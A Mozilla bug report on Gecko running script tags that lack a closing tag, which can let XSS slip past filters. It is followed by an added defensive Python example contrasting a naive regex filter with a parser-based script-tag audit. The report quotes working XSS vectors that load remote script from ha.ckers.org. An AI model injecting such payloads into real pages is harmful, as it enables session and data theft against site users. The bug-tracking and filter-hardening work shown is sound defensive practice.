Closed
Bug 376899
Opened 19 years ago
Closed 19 years ago
Closing tag for scripts should be required
Categories
(Core :: DOM: HTML Parser, defect)
RESOLVED
WORKSFORME
People
(Reporter: jwkbugzilla, Assigned: mrbkap)
Currently Gecko makes it easier to evade filters and length restrictions in XSS by not requiring a closing tag for scripts:
<SCRIPT SRC=http://ha.ckers.org/.j>
This script will execute even if there is no closing </SCRIPT> for it. Other browsers will not execute this script; Gecko should behave in the same way.
Comment 1 (Reporter) • 19 years ago
Note: this is similar to bug 226495 but AFAICT with all example pages gone bug 226495 is about http://ha.ckers.org/xss.html#XSS_No_closing_script_tags and has been fixed by bug 305873. This bug is about http://ha.ckers.org/xss.html#XSS_Protocol_resolution however and is still open in the current trunk nightlies.
Comment 2 (Assignee) • 19 years ago
So the actual testcase we care about here is actually:
<SCRIPT src=//ha.ckers.org/.j></SCRIPT>
Right? If the version without the </SCRIPT> is executing on trunk, then there's a bug in my patch for bug 305873 that needs to be fixed. Otherwise, this belongs to networking (I think) to figure out the correct way to deal with the seemingly invalid "//" protocol.
Comment 3 (Reporter) • 19 years ago
No, URLs starting with // are bug 362259 which seems to be a WONTFIX. Actually, your patch for bug 305873 is doing just fine in the nightlies, not sure why the testcase worked in my own build. Resolving WORKSFORME, sorry about not testing properly.
Status: NEW → RESOLVED
Closed: 19 years ago
Resolution: --- → WORKSFORME
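The filter concern raised in the description, seen from the filtering side, as an added example that is not part of the bug report or of Gecko: a hypothetical paired-tag regex filter misses a script element that has no closing tag, while an audit based on a tolerant parser records every script start tag and resolves protocol-relative src values against the page URL. The host names and sample markup are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Hypothetical naive filter: it only recognises a script element when both
# the opening and the closing tag are present in the submitted markup.
PAIRED_SCRIPT = re.compile(r"<script\b[^>]*>.*?</script\s*>", re.I | re.S)

def naive_filter_flags(markup):
    return bool(PAIRED_SCRIPT.search(markup))

class ScriptTagAudit(HTMLParser):
    """Record every <script> start tag, whether or not it is ever closed."""

    def __init__(self, page_url):
        super().__init__(convert_charrefs=True)
        self.page_url = page_url
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names for us.
        if tag != "script":
            return
        src = dict(attrs).get("src")
        # urljoin resolves "//host/path" using the scheme of the page URL.
        resolved = urljoin(self.page_url, src) if src else None
        external = bool(resolved) and (
            urlsplit(resolved).netloc != urlsplit(self.page_url).netloc
        )
        self.findings.append({"src": src, "resolved": resolved, "external": external})

def audit(markup, page_url):
    parser = ScriptTagAudit(page_url)
    parser.feed(markup)
    parser.close()
    return parser.findings

# Constructed sample inputs (not taken from the bug report).
PAGE = "https://app.example.test/page"
UNCLOSED = "<p>hi</p><SCRIPT SRC=http://cdn.example.test/x.js><p>after</p>"
PROTOCOL_RELATIVE = "<SCRIPT src=//cdn.example.test/x.js></SCRIPT>"
SAME_ORIGIN = '<script src="/static/app.js"></script>'

if __name__ == "__main__":
    for sample in (UNCLOSED, PROTOCOL_RELATIVE, SAME_ORIGIN):
        print(naive_filter_flags(sample), audit(sample, PAGE))
```

A filter that decides on start tags alone gives the same verdict whether or not a given browser executes an unclosed script element.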